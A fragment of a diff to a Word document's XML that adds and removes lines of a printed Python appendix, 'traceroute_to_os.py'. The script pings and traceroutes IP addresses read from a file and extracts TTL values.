+        </w:rPr>
+        <w:t xml:space="preserve">(r'\d+', </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ttl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).group(0)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ttl_value_int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = int(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ttl_value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_proc.returncode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> != 0:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print("{} is not responding to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>pings".format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            continue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>traceroute_proc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>subprocess.Popen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(['traceroute', '{}'.format(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)], </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>stdout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>subprocess.PIPE</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Appendix</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Appendix 1: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>traceroute_to_o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s.py</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>#/usr/bin/python3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>import sys</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>import subprocess</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>import re</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">def </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>check_ping</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_file</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    f = open(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_file</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>, "r")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    lines = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>f.readlines</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>traceroute_value</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = []</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>trace_ttl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = []</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    for line in lines:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ip_addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>line.strip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_proc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>subprocess.Popen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(['ping', '-c', '1', '{}'.format(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ip_addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)], </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>stdout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>subprocess.PIPE</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NoSpacing"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_stdout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>ping_stderr</w:t>
